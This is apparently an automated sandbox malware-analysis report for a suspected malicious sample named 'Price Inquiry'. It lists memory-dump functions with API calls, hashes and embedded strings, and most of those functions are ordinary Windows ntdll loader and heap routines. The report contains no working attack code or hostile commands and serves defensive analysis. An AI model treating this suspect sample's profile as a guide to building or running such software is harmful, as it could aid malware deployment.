Opcode ID: 866ad238b9475ed576715e4d4bc55d68e1c652e5d4aff164c9ce62ae2b67d712
Instruction ID: 64f7500e0aefcda8489cb7304fd757640c76f8965bafc5e5f72b1ce7af980fe5
Opcode Fuzzy Hash: 866ad238b9475ed576715e4d4bc55d68e1c652e5d4aff164c9ce62ae2b67d712
Instruction Fuzzy Hash: 82E06D722007047BC610EE59DC45F9B33ACEFC8710F004019FA09A7281D674B9108BB8

Function 0042C823 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,C103CA33,00000007,00000000,00000004,00000000,00416F1C,000000F4), ref: 0042C85C

Memory Dump Source

Source File: 00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Price Inquiry.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4fc3ec8936f6b1931ceba89b590bfce49c52afe1fdc88f053dc06a18979b8893
Instruction ID: a73e3b6872fe73949bf9cc72bbbd870a964e6841ef135330afd6eab9bdc47a97
Opcode Fuzzy Hash: 4fc3ec8936f6b1931ceba89b590bfce49c52afe1fdc88f053dc06a18979b8893
Instruction Fuzzy Hash: 11E06D72600204BBD620EF89DC41E9B73ACDFC8710F004029FA08A7241C675B9118AB4

Function 0042C863 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,E21A8BFC,?,?,E21A8BFC), ref: 0042C89A

Memory Dump Source

Source File: 00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Price Inquiry.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 471a9c42635f0d09d50a005600461ca87487b9b48d0727ce6fa3b58ce348e680
Instruction ID: 4803e7fac674c7fec7ffa91ebfcd202b6ac4156625856eac4fe34165d05bb13c
Opcode Fuzzy Hash: 471a9c42635f0d09d50a005600461ca87487b9b48d0727ce6fa3b58ce348e680
Instruction Fuzzy Hash: 77E04676214214BBD620BB6ADC01F9BB7ACDFCA714F00442AFB0CA7241C670BA118AF4

Function 01712C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01712C24

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e262ef28ab00596a0cc49432d31e84d3ce9c4d935269d15c34b1b619e69922e2
Instruction ID: a323260477282b4cf44ad06a28dfc5d363ee79f45c3d97220a96efcf4ca99216
Opcode Fuzzy Hash: e262ef28ab00596a0cc49432d31e84d3ce9c4d935269d15c34b1b619e69922e2
Instruction Fuzzy Hash: 61B09B719055D5C6DB11E7644609717B95077D0701F25C071D3030651F4739C1D1E276

Non-executed Functions

Function 01788D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE

Download Yara Rule

Strings

The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01788E86
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01788D8C
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01788F34
an invalid address, %p, xrefs: 01788F7F
read from, xrefs: 01788F5D, 01788F62
*** A stack buffer overrun occurred in %ws:%s, xrefs: 01788DA3
*** enter .cxr %p for the context, xrefs: 01788FBD
*** then kb to get the faulting stack, xrefs: 01788FCC
The resource is owned shared by %d threads, xrefs: 01788E2E
The resource is owned exclusively by thread %p, xrefs: 01788E24
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01788DB5
Go determine why that thread has not released the critical section., xrefs: 01788E75
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01788FEF
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01788F2D
*** Resource timeout (%p) in %ws:%s, xrefs: 01788E02
The critical section is owned by thread %p., xrefs: 01788E69
The instruction at %p tried to %s , xrefs: 01788F66
*** An Access Violation occurred in %ws:%s, xrefs: 01788F3F
a NULL pointer, xrefs: 01788F90
The instruction at %p referenced memory at %p., xrefs: 01788EE2
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 01788E4B
*** enter .exr %p for the exception record, xrefs: 01788FA1
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01788F26
*** Inpage error in %ws:%s, xrefs: 01788EC8
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01788E3F
<unknown>, xrefs: 01788D2E, 01788D81, 01788E00, 01788E49, 01788EC7, 01788F3E
write to, xrefs: 01788F56
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01788DD3
This failed because of error %Ix., xrefs: 01788EF6
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01788DC4

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 87471cb5c40f6854a3df667dd555a52042e35c09ed985d9214bde072e6e5eb27
Instruction ID: 284113a2cb24c185c848d2062bc1eef8204275272f4b1b0c82c24fa365d25769
Opcode Fuzzy Hash: 87471cb5c40f6854a3df667dd555a52042e35c09ed985d9214bde072e6e5eb27
Instruction Fuzzy Hash: 1481D1B5A84215BFDB21AB19CC49D7BBB35EF6AB50F41404CF6096F252E3B18441CA63

Function 01752349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

LdrpInitializeExecutionOptions, xrefs: 0175317D
FrontEndHeapDebugOptions, xrefs: 01752489
UnloadEventTraceDepth, xrefs: 017524C0
RaiseExceptionOnPossibleDeadlock, xrefs: 01752579
MaxLoaderThreads, xrefs: 017524EC
@, xrefs: 01752B74
DisableHeapLookaside, xrefs: 0175246D
minkernel\ntdll\ldrinit.c, xrefs: 01753187
TracingFlags, xrefs: 01752549
ExecuteOptions, xrefs: 017525A0
ShutdownFlags, xrefs: 017524A1
CFGOptions, xrefs: 01752967
@, xrefs: 01752942
DisableExceptionChainValidation, xrefs: 0175275F
GlobalFlag2, xrefs: 01752FC0
MinimumStackCommitInBytes, xrefs: 01752BB0
MaxDeadActivationContexts, xrefs: 01752D82
UseImpersonatedDeviceMap, xrefs: 0175251C
GlobalFlag, xrefs: 01752F3F, 01753059
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01753176

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 7fcc1c934a3d0d3c51d33a4153c6a756d0a8160538800c16a6db98d567f82864
Instruction ID: beeb591ded4f11a8d671c6d41a9bf33e0b09ebdca9be1dfdcd7166263b14cafa
Opcode Fuzzy Hash: 7fcc1c934a3d0d3c51d33a4153c6a756d0a8160538800c16a6db98d567f82864
Instruction Fuzzy Hash: 9F927C71608342EFE761CF28C884B6BF7E9BB84754F04491DFA9597292D7B0E844CB92

Function 01708620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017454CE
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0174540A, 01745496, 01745519
Address of the debug info found in the active list., xrefs: 017454AE, 017454FA
Critical section address, xrefs: 01745425, 017454BC, 01745534
Critical section address., xrefs: 01745502
undeleted critical section in freed memory, xrefs: 0174542B
corrupted critical section, xrefs: 017454C2
Invalid debug info address of this critical section, xrefs: 017454B6
double initialized or corrupted critical section, xrefs: 01745508
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017454E2
Thread identifier, xrefs: 0174553A
8, xrefs: 017452E3
Thread is in a state in which it cannot own a critical section, xrefs: 01745543
Critical section debug info address, xrefs: 0174541F, 0174552E

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: a19ef51b28a964bb0f85ab3cdb6a7263735e9e635715b86b3a3a4a71973acb52
Instruction ID: 81c9c85de52a70d7064106ab8b1c5bce411a136366a4b15c8f94e05c13c819c0
Opcode Fuzzy Hash: a19ef51b28a964bb0f85ab3cdb6a7263735e9e635715b86b3a3a4a71973acb52
Instruction Fuzzy Hash: A9815AB1A41358EFDB20CF99CC85BAEFBB9EB08B14F244159F505B7281D375A980CB90

Function 017029F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01742602
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01742624
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01742412
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017422E4
RtlpResolveAssemblyStorageMapEntry, xrefs: 0174261F
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017425EB
@, xrefs: 0174259B
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017424C0
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01742498
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01742506
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01742409

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 68aecd692f381e0e7d18485d61d02159c9105855edeb065950bc283ca5191907
Instruction ID: 66b16c8c44d62429f34dba0e1981413db21ebe1ed943b52725f56627a056f9a5
Opcode Fuzzy Hash: 68aecd692f381e0e7d18485d61d02159c9105855edeb065950bc283ca5191907
Instruction Fuzzy Hash: 5B0252F2D042299BDB21DB54CD84BDAF7B8AF54704F0041DAE609A7282EB709ED4CF59

Function 01778B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01778BD0
heapType, xrefs: 01778BCB
svchost.exe, xrefs: 01778B68
lsass.exe, xrefs: 01778BA1
smss.exe, xrefs: 01778B8B
csrss.exe, xrefs: 01778B80
DefaultBrowser_NOPUBLISHERID, xrefs: 01778D00
runtimebroker.exe, xrefs: 01778B73
SegmentHeap, xrefs: 01778BE9
services.exe, xrefs: 01778B96

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: c7cb5154711e6d6e7da7969957fdcc3121c1160e222b8c5d4c30ec87aa1b9885
Instruction ID: e3ad4a6e6f77329c8e1a9d8184ea6b18a66a8e3016618bd4b22bd211ff581e11
Opcode Fuzzy Hash: c7cb5154711e6d6e7da7969957fdcc3121c1160e222b8c5d4c30ec87aa1b9885
Instruction Fuzzy Hash: A451BF716043019BDB29CF28C848BABFBECFF98650F55496DE95983244E770DA44CB93

Function 016EAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

LdrpInitializeDllPath, xrefs: 017380AD
DLL search path passed in externally: %ws, xrefs: 017380A6
LdrGetDllHandleEx, xrefs: 0173807C, 017383B2
Status: 0x%08lx, xrefs: 017382D0, 017383AB
LdrpFindLoadedDllInternal, xrefs: 017382D7
minkernel\ntdll\ldrapi.c, xrefs: 01738086, 017383BC
minkernel\ntdll\ldrutil.c, xrefs: 017380B7
minkernel\ntdll\ldrfind.c, xrefs: 017382E1
DLL name: %wZ, xrefs: 01738075

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: 774372cf2cbba732561d0089a84a59401f211f7605aa1fe2d06bb630e1fa912f
Instruction ID: 5cdab0a70aa216470364efeefc1d1eec2912c62b1c2fcc12377813f39691d4d8
Opcode Fuzzy Hash: 774372cf2cbba732561d0089a84a59401f211f7605aa1fe2d06bb630e1fa912f
Instruction Fuzzy Hash: 4C12F17160A3428FD321DF68C888BBABBE5BF84714F04465DF9858B391E730D945CB92

Function 01780274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

Just reallocated block at %p to %Ix bytes, xrefs: 017805F1
RtlReAllocateHeap, xrefs: 017802BF, 01780362
HEAP: , xrefs: 017803A6, 017804B5, 017805DD, 01780682, 017806D9
About to reallocate block at %p to %Ix bytes, xrefs: 017803BA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0178069F
HEAP[%wZ]: , xrefs: 01780399, 017804A8, 017805D0, 01780675, 017806CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 017806EA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 017804D3

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 1d8b2a7913afac52f1e02ba79d8f6f3b5c550b6438f6383320390a0d8ef5e6e5
Instruction ID: a5f3d6bd6fe2f2f64a1c88d250dd0b81b9b757ec6916efd444103893f92b575a
Opcode Fuzzy Hash: 1d8b2a7913afac52f1e02ba79d8f6f3b5c550b6438f6383320390a0d8ef5e6e5
Instruction Fuzzy Hash: 91D1EF31680681DFDB22EF68C855AADFBF2FF4A724F18804DF4469B652C7349949CB24

Function 017589B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01758A67
VerifierFlags, xrefs: 01758C50
VerifierDebug, xrefs: 01758CA5
HandleTraces, xrefs: 01758C8F
AVRF: -*- final list of providers -*- , xrefs: 01758B8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01758A3D
VerifierDlls, xrefs: 01758CBD

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 8c8659e8e7f8c1f92077c049b39b6cc11cdbda1d81d9654d0526a3b909ed9384
Instruction ID: 84c88039c3c9b80d41a2cebd8d8b285b6d52c9ab996d8447fff904edc43aa964
Opcode Fuzzy Hash: 8c8659e8e7f8c1f92077c049b39b6cc11cdbda1d81d9654d0526a3b909ed9384
Instruction Fuzzy Hash: DC9134B2605716EFD361DF2A8880B5AFBE9EB54B24F04445CFE416B241D7B0ED40CB96

Function 016DEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

LdrpResSearchResourceInsideDirectory Exit, xrefs: 016DEB6C
{, xrefs: 01734643
, xrefs: 016DF299
LdrpResSearchResourceInsideDirectory Enter, xrefs: 016DEB58
T, xrefs: 016DEB4E
R, xrefs: 016DEB62

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: b29738a6995db18b2780eacc6709071ef4e0a543797bb13e4e8e970b4db01aa1
Instruction ID: 3364624631dd50a5832fca4b6ad93142e6634c24976d5ec4870007a9e3342fde
Opcode Fuzzy Hash: b29738a6995db18b2780eacc6709071ef4e0a543797bb13e4e8e970b4db01aa1
Instruction Fuzzy Hash: 4AA22A74E0562A8FDB68CF28CC887A9BBB5AF85304F1442E9D50EA7351DB359E81CF40

Function 017063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Delaying execution failed with status 0x%08lx, xrefs: 01744258
Process initialization failed with status 0x%08lx, xrefs: 0174413A
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 017440D8
_LdrpInitialize, xrefs: 017440DF, 01744141, 01744205, 0174425F
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 017441FE
minkernel\ntdll\ldrinit.c, xrefs: 017440E9, 0174414B, 0174420F, 01744269

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 21e9d219d8276c8490c31f6e06fa2aabef8504591307ce292fba95dbd47f36c5
Instruction ID: 09e95fb2456fabcd9c7264011e8642c42432f3f7aa7758e00cfc23db9ab1bae0
Opcode Fuzzy Hash: 21e9d219d8276c8490c31f6e06fa2aabef8504591307ce292fba95dbd47f36c5
Instruction Fuzzy Hash: 32912170B00312DBEB26DF58D8A8BAAFBE1BF50B24F15416CF9066B2C5D7B09941D790

Function 016C645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Loading the shim user DLL failed with status 0x%08lx, xrefs: 01729A2A
Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 017299ED
LdrpInitShimEngine, xrefs: 017299F4, 01729A07, 01729A30
apphelp.dll, xrefs: 016C6496
Getting the shim user exports failed with status 0x%08lx, xrefs: 01729A01
minkernel\ntdll\ldrinit.c, xrefs: 01729A11, 01729A3A

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 95c6c3f6bb1661d768e0fd8df2d87ca5799d6530a448f9c72c0898e1cd13e858
Instruction ID: 14829223506fb3bbede4248628f0ec4684537fc2d5dfd09c8e02e08c65c7b6eb
Opcode Fuzzy Hash: 95c6c3f6bb1661d768e0fd8df2d87ca5799d6530a448f9c72c0898e1cd13e858
Instruction Fuzzy Hash: 6851F1712083109FE720DF24DC85BABB7E9FB84B58F44491DFA8697250DB30EA45CB96

Function 01702674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017421BF
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01742178
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0174219F
SXS: %s() passed the empty activation context, xrefs: 01742165
RtlGetAssemblyStorageRoot, xrefs: 01742160, 0174219A, 017421BA
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01742180

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: aae85aecdcec4dbe243a399c53d330a1501c1b323b9c1ef628054be7d925b4fd
Instruction ID: 2fee0b9207aba728eff567c9b05cf2d47f91cb8daf366bdd8a07cf6cdc70cb0d
Opcode Fuzzy Hash: aae85aecdcec4dbe243a399c53d330a1501c1b323b9c1ef628054be7d925b4fd
Instruction Fuzzy Hash: 0C313936B00315B7E7229A999C89F9FFAA8DBA5A80F050059FB0577182D3709E40C7A1

Function 0170C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Loading import redirection DLL: '%wZ', xrefs: 01748170
LdrpInitializeProcess, xrefs: 0170C6C4
minkernel\ntdll\ldrinit.c, xrefs: 0170C6C3
minkernel\ntdll\ldrredirect.c, xrefs: 01748181, 017481F5
LdrpInitializeImportRedirection, xrefs: 01748177, 017481EB
Unable to build import redirection Table, Status = 0x%x, xrefs: 017481E5

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: f7526f90f18291c00577c2e56ee71af8ed4f2106404e0ddeeb979ad049569ec6
Instruction ID: ee89ce0f76c21b78459d8959ca03a31701b0a6a43a0671eeb6d895a010009341
Opcode Fuzzy Hash: f7526f90f18291c00577c2e56ee71af8ed4f2106404e0ddeeb979ad049569ec6
Instruction Fuzzy Hash: 3331F1727443069FC321EB68DD8AE6AB7D5FF90B20F01065CF9456B295E720EC04CBA2

Function 0171096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01712DF0: LdrInitializeThunk.NTDLL ref: 01712DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01710BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01710BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01710D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01710D74

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 54972b98f9135f4f737faf35395907fc2cf60281de23b74a85e0fe21806a17aa
Instruction ID: 67591f156e65ea1a94e8a0f43b7abceb4307c5a091785f0824768697512898b4
Opcode Fuzzy Hash: 54972b98f9135f4f737faf35395907fc2cf60281de23b74a85e0fe21806a17aa
Instruction Fuzzy Hash: D1426C75900715DFDB21CF28C840BAAB7F5BF48314F1485A9EA89EB245E770AA84CF61

Function 016DA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Exit, xrefs: 016DA3FF
LdrResFallbackLangList Enter, xrefs: 016DA3EF
6, xrefs: 016DA3F7
8, xrefs: 016DA3E7

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

